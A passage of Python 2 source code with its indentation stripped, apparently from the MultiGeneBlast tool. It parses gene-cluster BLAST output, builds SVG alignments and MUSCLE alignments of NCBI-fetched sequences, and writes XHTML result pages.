def score_blast_output(hitclusters, querylist, blastdict, multiplehitlist, proteins, proteininfo, querytags, infile, clusters, nucdescriptions, pages, arch_search, syntenyweight):
rankedclusters, rankedclustervalues, hitclusterdata = score_blast(hitclusters, querylist, blastdict, clusters, multiplehitlist, arch_search, syntenyweight)
pages = write_txt_output(rankedclusters, rankedclustervalues, hitclusterdata, proteins, proteininfo, querytags, infile, clusters, nucdescriptions, pages)
return pages
def read_multigeneblast_data(page):
queryclusterdata = {}
nrhitgeneclusters = {}
clusterblastfile = open(dbname + "clusterblast_output.txt","r")
clusterblastfile = clusterblastfile.read()
clusterblastfile = clusterblastfile.replace("\r","\n")
tophitclusters = []
#Identify top 50 hits for visualization
hitlines = [i for i in ((clusterblastfile.split("Significant hits: \n")[1]).split("\nDetails:")[0]).split("\n") if i != ""]
a = 0
cb_accessiondict = {}
b = 1
for i in hitlines:
if " " in i:
cb_accessiondict[b] = (i.split("\t")[0]).split(" ")[1]
b += 1
if a < page * 50 and a >= (page - 1) * 50:
if len(i) < 140:
tophitclusters.append(i)
elif len(i) >= 140:
j = i[0:137] + "..."
tophitclusters.append(j)
a += 1
details = (clusterblastfile.split("\nDetails:")[1]).split(">>")[1:]
nrhitclusters = len(tophitclusters)
frame_update()
#Save query gene cluster data
querylines = ((clusterblastfile.split("Table of genes, locations, strands and annotations of query cluster:\n")[1]).split("\n\n\nSignificant hits:")[0]).split("\n")
queryclustergenes = []
queryclustergenesdetails = {}
for i in querylines:
tabs = i.split("\t")
queryclustergenes.append(tabs[0])
queryclustergenesdetails[tabs[0]] = [tabs[1],tabs[2],tabs[3],tabs[4], tabs[5]]
#Sort query cluster genes by start position
starts = [max([int(queryclustergenesdetails[gene][0]), int(queryclustergenesdetails[gene][1])]) for gene in queryclustergenes]
genesAndStarts = zip(starts, queryclustergenes)
genesAndStarts.sort()
starts, queryclustergenes = zip(*genesAndStarts)
return queryclusterdata, nrhitgeneclusters, nrhitclusters, cb_accessiondict, queryclustergenes, queryclustergenesdetails, tophitclusters, details
def process_multigeneblast_data(nrhitgeneclusters, nrhitclusters, cb_accessiondict, queryclustergenes, queryclustergenesdetails, internalhomologygroupsdict, tophitclusters, details, page):
#For every gene cluster, store hit genes and details
colorgroupsdict = {}
hitclusterdata = {}
blastdetails = {}
mgb_scores = {}
hitclusternr = 1
for i in details:
frame_update()
hitclustergenes = []
hitclustergenesdetails = {}
#Only calculate for specified hit gene clusters
if not (hitclusternr <= page * 50 and hitclusternr >= (page - 1) * 50):
hitclusternr += 1
else:
nrhitgeneclusters[1] = hitclusternr
accession = cb_accessiondict[hitclusternr]
#Store mgb score
mgbscore = i.partition("MultiGeneBlast score: ")[2].partition("\n")[0]
cumblastscore = i.partition("Cumulative Blast bit score: ")[2].partition("\n")[0]
mgb_scores[accession] = [mgbscore, cumblastscore]
#Store Blast details
blastdetailslines = [line for line in (i.split("%coverage, e-value):\n")[1]).split("\n") if line != ""]
for line in blastdetailslines:
tabs = line.split("\t")
if not blastdetails.has_key(accession):
blastdetails[accession] = {}
if not blastdetails[accession].has_key(tabs[1]):
blastdetails[accession][tabs[1]] = [[tabs[0], tabs[2], tabs[3], tabs[4], tabs[5]]]
else:
blastdetails[accession][tabs[1]].append([tabs[0], tabs[2], tabs[3], tabs[4], tabs[5]])
#Store Basic Blast output data
hitclustergeneslines = [line for line in ((i.split("Table of genes, locations, strands and annotations of subject cluster:\n")[1]).split("\n\nTable of Blast hits ")[0]).split("\n") if line != ""]
locations = []
for j in hitclustergeneslines:
tabs = j.split("\t")
hitclustergenes.append(tabs[0])
hitclustergenesdetails[tabs[0]] = [tabs[1],tabs[2],tabs[3],tabs[4], tabs[5]]
locations = locations + [int(tabs[1]),int(tabs[2])]
#cstart = min(locations)
#cend = max(locations)
#print [proteininfo[j][0] for j in proteininfo.keys()]
#z = 0
#for j in proteininfo.keys():
# if accession.rpartition("_")[0] == proteininfo[j][0]:
# z += 1
# if z == 200:
# z = 0
# if int(proteininfo[j][1]) > cstart and int(proteininfo[j][2]) < cend:
# #proteininfo[j] = [genome,location.partition("-")[0],location.partition("-")[2],strand,annotation]
# if j not in hitclustergenes:
# hitclustergenes.append(j)
# hitclustergenesdetails[j] = proteininfo[j][1:]
blasthitslines = [line for line in ((i.split("%coverage, e-value):\n")[1]).split("\n\n")[0]).split("\n") if line != ""]
if len(blasthitslines) > 0:
blasthitdict = {}
blastdetailsdict = {}
querygenes = []
revblasthitdict = {}
hitgenes = []
for i in blasthitslines:
tabs = i.split("\t")
if blasthitdict.has_key(tabs[0]):
hits = blasthitdict[tabs[0]]
hits.append(tabs[1])
blasthitdict[tabs[0]] = hits
if revblasthitdict.has_key(tabs[1]):
revhits = revblasthitdict[tabs[1]]
revhits.append(tabs[0])
revblasthitdict[tabs[1]] = revhits
else:
revblasthitdict[tabs[1]] = [tabs[0]]
blastdetailsdict[tabs[0] + "_|_|_" + tabs[1]] = [tabs[4],tabs[3]]
if tabs[0] not in querygenes:
querygenes.append(tabs[0])
hitgenes.append(tabs[1])
else:
blasthitdict[tabs[0]] = [tabs[1]]
if revblasthitdict.has_key(tabs[1]):
revhits = revblasthitdict[tabs[1]]
revhits.append(tabs[0])
revblasthitdict[tabs[1]] = revhits
else:
revblasthitdict[tabs[1]] = [tabs[0]]
blastdetailsdict[tabs[0] + "_|_|_" + tabs[1]] = [tabs[4],tabs[3]]
if tabs[0] not in querygenes:
querygenes.append(tabs[0])
hitgenes.append(tabs[1])
#Make groups of genes for coloring
colorgroups = []
internalgroups = internalhomologygroupsdict[1]
for i in internalgroups:
querygenes_and_hits = []
for j in i:
#Make list of query gene and its hits
additionalhits = []
#For each hit, check if it was also hit by another gene; if so, only add it to the group if this hit had the lowest blast score
queryscore = 0
if blasthitdict.has_key(j):
for k in blasthitdict[j]:
otherscores = []
for l in blastdetailsdict.keys():
if j == l.partition("_|_")[0] and k == l.rpartition("_|_")[2]:
queryscore = blastdetailsdict[l][1]
if k in l and j not in l:
otherscores.append(blastdetailsdict[l][1])
allscores = otherscores + [queryscore]
if int(queryscore) == max([int(m) for m in allscores]):
additionalhits.append(k)
#Add additional hits to the querygenes_and_hits list that will form a colorgroup
querygenes_and_hits = querygenes_and_hits + additionalhits
if j not in querygenes_and_hits:
querygenes_and_hits.append(j)
if len(querygenes_and_hits) > 0:
colorgroups.append(querygenes_and_hits)
colorgroupsdict[hitclusternr] = colorgroups
hitclusterdata[hitclusternr] = [colorgroupsdict,hitclustergenes,hitclustergenesdetails,queryclustergenes,queryclustergenesdetails,tophitclusters,accession]
hitclusternr += 1
else:
nrhitclusters = nrhitclusters - 1
if len(details) == 0:
log("MultiGeneBlast found no significant hits. Exiting...", exit=True)
return hitclusterdata, nrhitclusters, blastdetails, mgb_scores
def write_svg_files(queryclusterdata, hitclusterdata, nrhitclusters, internalhomologygroupsdict, svgfolder, page, screenwidth, arch_search):
queryclusterdata[1] = [nrhitclusters,hitclusterdata]
clusterblastpositiondata = {}
i = page
#Create alignment svg for each pair of hit&query
hitclusters = [nr + (page - 1) * 50 for nr in range(queryclusterdata[1][0] + 1)[1:]]
#Create svgs for pairwise gene cluster alignment
colorschemedict,rgbcolorscheme = calculate_colorgroups(1,hitclusters,queryclusterdata,internalhomologygroupsdict)
for k in hitclusters:
frame_update()
cresults = clusterblastresults(page,[k],queryclusterdata,colorschemedict,rgbcolorscheme, screenwidth, arch_search)
s = cresults[0]
clusterblastpositiondata[str(i) + "_"+str(k)] = cresults[1]
outfile = open(svgfolder + "clusterblast" + str(i) + "_" + str(k) + ".svg","w")
outfile.write(s.getXML())
outfile.close()
#Create svgs for multiple gene cluster alignment
cresults = clusterblastresults(page,hitclusters,queryclusterdata,colorschemedict,rgbcolorscheme, screenwidth, arch_search, allhits="y")
s = cresults[0]
clusterblastpositiondata[str(i) + "_all"] = cresults[1]
outfile = open(svgfolder + "clusterblast" + str(i) + "_all.svg","w")
outfile.write(s.getXML())
outfile.close()
return clusterblastpositiondata, colorschemedict
def write_svgs(page, screenwidth, internalhomologygroupsdict, arch_search):
log("Writing visualization SVGs and XHTML")
svgfolder = "svg/"
try:
os.mkdir(svgfolder)
except(IOError,OSError):
pass
#Read in MultiGeneBlast output data
queryclusterdata, nrhitgeneclusters, nrhitclusters, cb_accessiondict, queryclustergenes, queryclustergenesdetails, tophitclusters, details = read_multigeneblast_data(page)
hitclusterdata, nrhitclusters, blastdetails, mgb_scores = process_multigeneblast_data(nrhitgeneclusters, nrhitclusters, cb_accessiondict, queryclustergenes, queryclustergenesdetails, internalhomologygroupsdict, tophitclusters, details, page)
clusterblastpositiondata, colorschemedict = write_svg_files(queryclusterdata, hitclusterdata, nrhitclusters, internalhomologygroupsdict, svgfolder, page, screenwidth, arch_search)
return queryclusterdata, colorschemedict, clusterblastpositiondata, blastdetails, mgb_scores
def runmuscle(args):
os.system("muscle " + args)
def align_muscle(include_muscle, colorschemedict, seqdict):
#Create Muscle alignments of colourgroups
musclegroups = []
if include_muscle == "y":
log("Aligning homologous sequences with Muscle")
try:
os.mkdir("fasta")
except(IOError,OSError):
pass
orthogroupsdup = colorschemedict.values()
orthogroups = dict.fromkeys(orthogroupsdup).keys()
for k in orthogroups:
frame_update()
accessions = []
for l in colorschemedict.keys():
if colorschemedict[l] == k:
accessions.append(l)
seqdict2 = {}
for key in seqdict.keys():
seqdict2[key.split("|")[-1]] = seqdict[key]
queryseqs = [">" + acc + "\n" + seqdict2[acc] + "\n" for acc in accessions if seqdict2.has_key(acc)]
accessions = [acc for acc in accessions if testaccession(acc) == "y"]
if len(queryseqs) + len(accessions) < 2:
continue
musclegroups.append(k)
url = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=protein&tool="multigeneblast"&ID=' + ",".join(accessions) + "&rettype=fasta&retmode=text"
urltry = "n"
tries = 0
while urltry == "n":
try:
time.sleep(3)
req = urllib2.Request(url)
response = urllib2.urlopen(req)
output = response.read()
if len(output) > 5:
urltry = "y"
if ">" not in output:
log("Downloading of FASTA sequences failed")
break
except (IOError,httplib.BadStatusLine,URLError,httplib.HTTPException):
tries += 1
if tries == 5:
break
log("Waiting for connection... (4)")
time.sleep(60)
outfile = open("fasta" + os.sep + "orthogroup" + str(k) + ".fasta","w")
for seq in queryseqs:
outfile.write(seq)
outfile.write(output)
outfile.close()
args = "-quiet -in fasta" + os.sep + "orthogroup" + str(k) + ".fasta -out fasta" + os.sep + "orthogroup" + str(k) + "_muscle.fasta"
muscleprocess = Process(target=runmuscle, args=[args])
muscleprocess.start()
while True:
processrunning = "n"
if muscleprocess.is_alive():
processrunning = "y"
if processrunning == "y":
frame_update()
elif processrunning == "y":
pass
else:
break
return musclegroups
def create_xhtml_template(queryclusterdata, page, pages):
#Create HTML file with gene cluster info in hidden div tags
htmlfile = open(MGBPATH + os.sep + "empty.xhtml","r")
html = htmlfile.read()
html = html.replace("\r","\n")
htmlparts = html.split("<SPLIT HERE>")
htmloutfile = open(dbname + "displaypage" + str(page) + ".xhtml","w")
htmloutfile.write(htmlparts[0] + ' displaycblastresults("' + str(page) + '","all")' + htmlparts[1])
htmloutfile.write("var list=[" + ",".join([str(nr + (page - 1) * 50 + 1) for nr in range(queryclusterdata[1][0])]) + ",'all'];" + htmlparts[2])
htmloutfile.write("var list=[" + ",".join([str(nr + (page - 1) * 50 + 1) for nr in range(queryclusterdata[1][0])]) + ",'all'];" + htmlparts[3])
htmloutfile.write('<a class="bigtext"><br/><br/> Results pages: ')
for pagenr in [pagenr + 1 for pagenr in range(pages)]:
htmloutfile.write('<a href="displaypage' + str(pagenr) + '.xhtml" class="bigtext">' + str(pagenr) + '</a>')
if pagenr != pages:
htmloutfile.write(", ")
else:
htmloutfile.write("</a>")
htmloutfile.write(htmlparts[4])
return htmloutfile, htmlparts
def write_xhtml_output(htmloutfile, queryclusterdata, clusters, clusterblastpositiondata, nucname, page, screenwidth, blastdetails, mgb_scores, musclegroups, colorschemedict, dbtype):
#Write ClusterBlast divs with pictures and description pop-up tags
frame_update()
htmloutfile.write('<div id="clusterblastview" class="clusterdescr">\n\n')
#Add menu bar 3
htmloutfile.write('<div id="bartext3" style="color:#FFFFFF; font-size:1em; position:absolute; z-index:2; top:3px; left:20px;"><b>MultiGeneBlast hits</b></div>')
htmloutfile.write('<div id="descrbar3" style="position:absolute; z-index:1; top:0px;"><img src="images/bar.png" height="25" width="' + str(int(0.75*screenwidth)) + '"/></div>')
htmloutfile.write('<div class="help" id="help3" style="position:absolute; z-index:1; top:2px; left:' + str(int(screenwidth * 0.75) - 30) + 'px;"><a href="http://multigeneblast.sourceforge.net/usage.html" target="_blank"><img border="0" src="images/help.png"/></a></div>')
qclusternr = page
nrhitclusters = queryclusterdata[1][0]
hitclusterdata = queryclusterdata[1][1]
htmloutfile.write('<div id="qcluster' + str(qclusternr) + '">\n<br/><br/>\n<div align="left">\n<form name="clusterform' + str(qclusternr) + '">\n<select name="selection' + str(qclusternr) + '" onchange="javascript:navigate(this);">\n')
htmloutfile.write('<option value="">Select gene cluster alignment</option>\n')
for i in range(nrhitclusters):
cdescription = hitclusterdata[i + 1 + (page - 1) * 50][5][i].replace("&","&")
if len(cdescription) > 80:
cdescription = cdescription[:77] + "..."
htmloutfile.write('<option value="javascript:displaycblastresults(' + str(page) + ',' + str(i+1 + (page - 1) * 50) + ')">' + cdescription + '</option>\n')
htmloutfile.write('</select>\n</form>\n\n</div>')
htmloutfile.write('<div style="position:absolute; top:33px; left:' + str(screenwidth*0.625) + 'px;"><img src="images/button.gif" name="button' + str(qclusternr) + '" onclick="javascript:displaybutton(' + str(qclusternr) + ');"/></div>')
for i in range(nrhitclusters):
frame_update()
hitclusterdata = queryclusterdata[1][1]
queryclustergenes = hitclusterdata[hitclusterdata.keys()[0]][3]
queryclustergenesdetails = hitclusterdata[hitclusterdata.keys()[0]][4]
hitclusternumber = i + 1 + (page - 1) * 50
cluster_acc = hitclusterdata[hitclusternumber][6]
cluster_blastdetails = blastdetails[cluster_acc]
mgbscore = mgb_scores[cluster_acc][0]
cumblastscore = mgb_scores[cluster_acc][1]
hitclustergenes = clusters[cluster_acc][0]
hitclustergenesdetails = hitclusterdata[hitclusternumber][2]
relpositiondata = clusterblastpositiondata[str(page) + "_" + str(i + 1 + (page - 1) * 50)]
qrel_starts = relpositiondata[0][0]
qrel_ends = relpositiondata[0][1]
hrel_starts = relpositiondata[1][hitclusternumber][0]
hrel_ends = relpositiondata[1][hitclusternumber][1]
strandsbalance = relpositiondata[2][hitclusternumber]
hstarts = relpositiondata[3][hitclusternumber][0]
hends = relpositiondata[3][hitclusternumber][1]
invertedhstarts = [str(100000000 - int(l)) for l in hstarts]
invertedhends = [str(100000000 - int(l)) for l in hends]
if strandsbalance < 0:
hitclustergenes.reverse()
htmloutfile.write('<div id="hitcluster' + str(qclusternr) + '_' + str(i + 1 + (page - 1) * 50) + '">\n')
#Load svg and embed it into XHTML
svglines = open("svg" + os.sep + "clusterblast" + str(qclusternr) + '_' + str(i + 1 + (page - 1) * 50) + ".svg","r").read().split("\n")
htmloutfile.write("\n" + svglines[0][:-1] + 'id="svg' + str(qclusternr) + '_' + str(i + 1 + (page - 1) * 50) + '" >' + "\n")
for svgline in svglines[1:]:
htmloutfile.write(svgline + "\n")
#Insert gene cluster descriptions
cgbkdescription = hitclusterdata[i + 1 + (page - 1) * 50][5][i].replace("&","&").replace("\t"," ").partition(" ")[2].partition(" ")[2].split(", whole")[0].split(", complete")[0].split(", partial")[0]
if len(cgbkdescription) > 90:
cgbkdescription = cgbkdescription[:87] + "..."
if testaccession(cluster_acc.rpartition("_")[0]) == "y":
cdescription = '<a href="http://www.ncbi.nlm.nih.gov/nuccore/' + cluster_acc.rpartition("_")[0] + '" target="_blank"> ' + cluster_acc.rpartition("_")[0] + "</a>" + " : " + cgbkdescription + " Total score: " + mgbscore + " Cumulative Blast bit score: " + cumblastscore
else:
cdescription = cluster_acc.rpartition("_")[0] + " : " + cgbkdescription + " Total score: " + mgbscore + " Cumulative Blast bit score: " + cumblastscore
if len(nucname) < 90:
qdescription = "Query: " + nucname
else:
qdescription = "Query: " + nucname[0:87] + "..."
htmloutfile.write('<div id="descriptionquery" style="text-align:left; position:absolute; top:60px; left:10px; font-size:10px; font-style:italic">' + qdescription + '</div>\n')
htmloutfile.write('<div id="description' + str(qclusternr) + '" style="text-align:left; position:absolute; top:115px; left:10px; font-size:10px; font-style:italic">' + cdescription + '</div>\n')
#Insert NCBI links
htmloutfile.write('<div id="pub_pics" style="position:absolute; top:175px; left:' + str(int(screenwidth * 0.0)) + 'px; font-size:10px"> Hit cluster cross-links: \n')
htmloutfile.write(' <a href="http://www.ncbi.nlm.nih.gov/nuccore/' + cluster_acc.rpartition("_")[0] + '" target="_blank"><img align="absmiddle" border="0" src="images/genbank.gif"/></a>\n')
htmloutfile.write('</div>\n\n')
#Create gene pop-ups
a = 0
for j in queryclustergenes:
j_accession = j
htmloutfile.write('<div id="q' + str(qclusternr) + "_" + str(hitclusternumber) + "_" + str(a) + '_div" class="hidden popup" style="position:absolute; top:' + str(100) + 'px; left:' + str(int(float(qrel_starts[a])*0.875)) + 'px;">\n')
htmloutfile.write(queryclustergenesdetails[j][3].replace("_"," ").replace("&","&") + "\n")
link = "http://blast.ncbi.nlm.nih.gov/Blast.cgi?PAGE=Proteins&PROGRAM=blastp&BLAST_PROGRAMS=blastp&QUERY=" + j_accession + "&LINK_LOC=protein&PAGE_TYPE=BlastSearch"
if j != queryclustergenesdetails[j][4] and testaccession(j) == "y":
htmloutfile.write('<br/>Accession: <a href="http://www.ncbi.nlm.nih.gov/protein/' + j + '" target="_blank">' + j + "</a>\n")
htmloutfile.write("<br/>Location: " + str(queryclustergenesdetails[j][0]) + "-" + str(queryclustergenesdetails[j][1]) + "\n")
htmloutfile.write("</div>\n\n")
htmloutfile.write('<div id="q' + str(qclusternr) + "_" + str(hitclusternumber) + "_" + str(a) + '_divtext" class="hidden genenames" style="position:absolute; top:' + str(75) + 'px; left:' + str(int(float((float(qrel_starts[a])+float(qrel_ends[a]))/2)*0.9375)) + 'px;">\n')
if queryclustergenesdetails[j][4] != "" and queryclustergenesdetails[j][4] != "no_locus_tag":
htmloutfile.write(queryclustergenesdetails[j][4])
else:
htmloutfile.write(j)
htmloutfile.write("</div>\n\n")
a+= 1
a = 0
for j in hitclustergenes:
if ((hitclustergenesdetails[j][0] in hstarts or hitclustergenesdetails[j][0] in hends) and (hitclustergenesdetails[j][1] in hends or hitclustergenesdetails[j][1] in hstarts)) or ((hitclustergenesdetails[j][1] in invertedhstarts or hitclustergenesdetails[j][1] in invertedhends) and (hitclustergenesdetails[j][0] in invertedhends or hitclustergenesdetails[j][0] in invertedhstarts)):
j_accession = j
htmloutfile.write('<div id="h' + str(qclusternr) + "_" + str(hitclusternumber) + "_" + str(a) + '_div" class="hidden popup" style="position:absolute; top:' + str(151) + 'px; left:' + str(int(float(hrel_starts[a])*0.875)) + 'px;">\n')
htmloutfile.write(hitclustergenesdetails[j][3].replace("_"," ").replace("&","&") + "\n")
link = "http://blast.ncbi.nlm.nih.gov/Blast.cgi?PAGE=Proteins&PROGRAM=blastp&BLAST_PROGRAMS=blastp&QUERY=" + j_accession + "&LINK_LOC=protein&PAGE_TYPE=BlastSearch"
if dbtype == "nucl":
htmloutfile.write('<br/>Accession: <a href="http://www.ncbi.nlm.nih.gov/nuccore/' + j.rpartition("_")[0] + '" target="_blank">' + j.rpartition("_")[0] + "</a>\n")
elif j != hitclustergenesdetails[j][4] and testaccession(j) == "y":
htmloutfile.write('<br/>Accession: <a href="http://www.ncbi.nlm.nih.gov/protein/' + j + '" target="_blank">' + j + "</a>\n")
htmloutfile.write("<br/>Location: " + str(hitclustergenesdetails[j][0]) + "-" + str(hitclustergenesdetails[j][1]) + "\n")
if cluster_blastdetails.has_key(j):
for blasthit in cluster_blastdetails[j]:
htmloutfile.write("<br/><br/><b>BlastP hit with " + blasthit[0] + "</b>\n<br/>Percentage identity: " + blasthit[1] + " %\n")
htmloutfile.write("<br/>BlastP bit score: " + blasthit[2] + "\n<br/>Sequence coverage: " + blasthit[3].partition(".")[0] + " %\n")
htmloutfile.write("<br/>E-value: " + blasthit[4] + "\n<br/>")
if testaccession(j) == "y" and dbtype != "nucl":
htmloutfile.write("<br/><a href=\"" + link + "\" target=\"_blank\"> NCBI BlastP on this gene </a>\n")
if colorschemedict.has_key(j) and colorschemedict[j] in musclegroups:
htmloutfile.write("<br/><a href=\"fasta" + os.sep + "orthogroup" + str(colorschemedict[j]) + "_muscle.fasta\" target=\"_blank\"> Muscle alignment of this gene with homologs </a>\n")
htmloutfile.write("</div>\n\n")
htmloutfile.write('<div id="h' + str(qclusternr) + "_" + str(hitclusternumber) + "_" + str(a) + '_divtext" class="hidden genenames" style="position:absolute; top:' + str(126) + 'px; left:' + str(int(float((float(hrel_starts[a])+float(hrel_ends[a]))/2)*0.9375)) + 'px;">\n')
if hitclustergenesdetails[j][4] != "" and hitclustergenesdetails[j][4] != "no_locus_tag":
htmloutfile.write(hitclustergenesdetails[j][4])
else:
htmloutfile.write(j)
htmloutfile.write("</div>\n\n")
a += 1
htmloutfile.write('</div>\n')
#Find new relative positions for display of all gene clusters in one picture
relpositiondata = clusterblastpositiondata[str(page) + "_all"]
if len(relpositiondata[0]) > 0:
qrel_starts = relpositiondata[0][0]
qrel_ends = relpositiondata[0][1]
htmloutfile.write('<div id="hitcluster' + str(page) + '_all" style="display:none">\n')
#Load svg and embed it into XHTML
svglines = open("svg" + os.sep + "clusterblast" + str(qclusternr) + "_all.svg","r").read().split("\n")
htmloutfile.write("\n" + svglines[0][:-1] + 'id="svg' + str(qclusternr) + '_all" >' + "\n")
for svgline in svglines[1:]:
htmloutfile.write(svgline + "\n")
if len(nucname) < 90:
qdescription = "Query: " + nucname
else:
qdescription = "Query: " + nucname[0:87] + "..."
htmloutfile.write('<div id="descriptionquery" style="text-align:left; position:absolute; top:60px; left:10px; font-size:10px; font-style:italic">' + qdescription + '</div>\n')
for i in range(nrhitclusters):
frame_update()
hitclusterdata = queryclusterdata[1][1]
queryclustergenes = hitclusterdata[hitclusterdata.keys()[0]][3]
queryclustergenesdetails = hitclusterdata[hitclusterdata.keys()[0]][4]
hitclusternumber = i + 1 + (page - 1) * 50
hrel_starts = relpositiondata[1][hitclusternumber][0]
hrel_ends = relpositiondata[1][hitclusternumber][1]
cluster_acc = hitclusterdata[hitclusternumber][6]
cluster_blastdetails = blastdetails[cluster_acc]
mgbscore = mgb_scores[cluster_acc][0]
cumblastscore = mgb_scores[cluster_acc][1]
hitclustergenes = clusters[cluster_acc][0]
hitclustergenesdetails = hitclusterdata[hitclusternumber][2]
strandsbalance = relpositiondata[2][hitclusternumber]
hstarts = relpositiondata[3][hitclusternumber][0]
hends = relpositiondata[3][hitclusternumber][1]
invertedhstarts = [str(100000000 - int(l)) for l in hstarts]
invertedhends = [str(100000000 - int(l)) for l in hends]
cgbkdescription = hitclusterdata[i + 1 + (page - 1) * 50][5][i].replace("&","&").replace("\t"," ").partition(" ")[2].partition(" ")[2].split(", whole")[0].split(", complete")[0].split(", partial")[0]
if len(cgbkdescription) > 90:
cgbkdescription = cgbkdescription[:87] + "..."
if testaccession(cluster_acc.rpartition("_")[0]) == "y":
cdescription = str(i+1 + (page - 1) * 50) + ". : " + '<a href="http://www.ncbi.nlm.nih.gov/nuccore/' + cluster_acc.rpartition("_")[0] + '" target="_blank"> ' + cluster_acc.rpartition("_")[0] + "</a> " + cgbkdescription + " Total score: " + mgbscore + " Cumulative Blast bit score: " + cumblastscore
else:
cdescription = str(i+1 + (page - 1) * 50) + ". : " + cluster_acc.rpartition("_")[0] + " " + cgbkdescription + " Total score: " + mgbscore + " Cumulative Blast bit score: " + cumblastscore
htmloutfile.write('<div id="description' + str(qclusternr) + '" style="text-align:left; position:absolute; top:' + str(int(63 + (51.7 * (hitclusternumber - (page - 1) * 50)))) + 'px; left:10px; font-size:10px; font-style:italic">' + cdescription + '</div>\n')
if hitclusternumber == 1 + (page - 1) * 50:
a = 0
for j in queryclustergenes:
htmloutfile.write('<div id="all_' + str(qclusternr) + "_0_" + str(a) + '_div" class="hidden popup" style="position:absolute; top:' + str(100) + 'px; left:' + str(int(float(qrel_starts[a])*0.875)) + 'px; z-index:2;">\n')
htmloutfile.write(queryclustergenesdetails[j][3].replace("_"," ").replace("&","&") + "\n")
link = "http://blast.ncbi.nlm.nih.gov/Blast.cgi?PAGE=Proteins&PROGRAM=blastp&BLAST_PROGRAMS=blastp&QUERY=" + j + "&LINK_LOC=protein&PAGE_TYPE=BlastSearch"
if j != queryclustergenesdetails[j][4] and testaccession(j) == "y":
htmloutfile.write('<br/>Accession: <a href="http://www.ncbi.nlm.nih.gov/protein/' + j + '" target="_blank">' + j + "</a>\n")
htmloutfile.write("<br/>Location: " + str(queryclustergenesdetails[j][0]) + "-" + str(queryclustergenesdetails[j][1]) + "\n")
if testaccession(j) == "y":
htmloutfile.write("<br/><a href=\"" + link + "\" target=\"_blank\"> NCBI BlastP on this gene </a>\n")
if colorschemedict.has_key(j) and colorschemedict[j] in musclegroups:
htmloutfile.write("<br/><a href=\"fasta" + os.sep + "orthogroup" + str(colorschemedict[j]) + "_muscle.fasta\" target=\"_blank\"> Muscle alignment of this gene with homologs </a>\n")
htmloutfile.write("</div>\n\n")
htmloutfile.write('<div id="all_' + str(qclusternr) + "_0_" + str(a) + '_divtext" class="hidden genenames" style="position:absolute; top:' + str(75) + 'px; left:' + str(int(float((float(qrel_starts[a])+float(qrel_ends[a]))/2)*0.9375)) + 'px;">\n')
if queryclustergenesdetails[j][4] != "" and queryclustergenesdetails[j][4] != "no_locus_tag":
htmloutfile.write(queryclustergenesdetails[j][4])
else:
htmloutfile.write(j)
htmloutfile.write("</div>\n\n")
a+= 1
a = 0
for j in hitclustergenes:
if ((hitclustergenesdetails[j][0] in hstarts or hitclustergenesdetails[j][0] in hends) and (hitclustergenesdetails[j][1] in hends or hitclustergenesdetails[j][1] in hstarts)) or ((hitclustergenesdetails[j][1] in invertedhstarts or hitclustergenesdetails[j][1] in invertedhends) and (hitclustergenesdetails[j][0] in invertedhends or hitclustergenesdetails[j][0] in invertedhstarts)):
htmloutfile.write('<div id="all_' + str(qclusternr) + "_" + str(hitclusternumber) + "_" + str(a) + '_div" class="hidden popup" style="position:absolute; top:' + str(int(100 + 51.7 * (hitclusternumber - (page - 1) * 50))) + 'px; left:' + str(int(float(hrel_starts[a])*0.875)) + 'px; z-index:2;">\n')
htmloutfile.write(hitclustergenesdetails[j][3].replace("_"," ").replace("&","&") + "\n")
link = "http://blast.ncbi.nlm.nih.gov/Blast.cgi?PAGE=Proteins&PROGRAM=blastp&BLAST_PROGRAMS=blastp&QUERY=" + j + "&LINK_LOC=protein&PAGE_TYPE=BlastSearch"
if dbtype == "nucl":
htmloutfile.write('<br/>Accession: <a href="http://www.ncbi.nlm.nih.gov/nuccore/' + j.rpartition("_")[2] + '" target="_blank">' + j.rpartition("_")[2] + "</a>\n")
elif j != hitclustergenesdetails[j][4] and testaccession(j) == "y":
htmloutfile.write('<br/>Accession: <a href="http://www.ncbi.nlm.nih.gov/protein/' + j + '" target="_blank">' + j + "</a>\n")
htmloutfile.write("<br/>Location: " + str(hitclustergenesdetails[j][0]) + "-" + str(hitclustergenesdetails[j][1]) + "\n")
if cluster_blastdetails.has_key(j):
for blasthit in cluster_blastdetails[j]:
htmloutfile.write("<br/><br/><b>BlastP hit with " + blasthit[0] + "</b>\n<br/>Percentage identity: " + blasthit[1] + " %\n")
htmloutfile.write("<br/>BlastP bit score: " + blasthit[2] + "\n<br/>Sequence coverage: " + blasthit[3].partition(".")[0] + " %\n")
htmloutfile.write("<br/>E-value: " + blasthit[4] + "\n<br/>")
if testaccession(j) == "y" and dbtype != "nucl":
htmloutfile.write("<br/><a href=\"" + link + "\" target=\"_blank\"> NCBI BlastP on this gene </a>\n")
if colorschemedict.has_key(j) and colorschemedict[j] in musclegroups:
htmloutfile.write("<br/><a href=\"fasta" + os.sep + "orthogroup" + str(colorschemedict[j]) + "_muscle.fasta\" target=\"_blank\"> Muscle alignment of this gene with homologs </a>\n")
htmloutfile.write("</div>\n\n")
htmloutfile.write('<div id="all_' + str(qclusternr) + "_" + str(hitclusternumber) + "_" + str(a) + '_divtext" class="hidden genenames" style="position:absolute; top:' + str(int(75 + 51.7 * (hitclusternumber - (page - 1) * 50))) + 'px; left:' + str(int(float((float(hrel_starts[a])+float(hrel_ends[a]))/2)*0.9375)) + 'px;">\n')
if hitclustergenesdetails[j][4] != "" and hitclustergenesdetails[j][4] != "no_locus_tag":
htmloutfile.write(hitclustergenesdetails[j][4])
else:
htmloutfile.write(j)
htmloutfile.write("</div>\n\n")
a += 1
htmloutfile.write('</div>\n')
htmloutfile.write('</div>\n\n')
else:
htmloutfile.write('<br/>No homologous gene clusters found.</div>\n')
htmloutfile.write('</div>\n')
htmloutfile.write('<div id="creditsbar' + str(i) + '" class="banner" style="position:absolute; width:' + str(int(0.98 * screenwidth)) +'px; align:\'left\'; height:75; top:2750px; left:0px; color:#000066; z-index:-1;">')
htmloutfile.write('<div style="float:center; font-size:0.9em;">\n<div style="position:absolute; top:0px; left:30px;">\n<img src="images/ruglogo.gif" border="0"/> \n<img src="images/gbblogo.gif" border="0"/> \n</div>\n<div style="position:absolute; top:10px; left:340px;">\nDetecting sequence homology at the gene cluster level with MultiGeneBlast.\n<br/>Marnix H. Medema, Rainer Breitling & Eriko Takano (2013)\n<br/><i>Molecular Biology and Evolution</i> , 30: 1218-1223.\n</div>\n</div>\n</div>')
def finalize_xhtml(htmloutfile, htmlparts):
#Add final part of HTML file
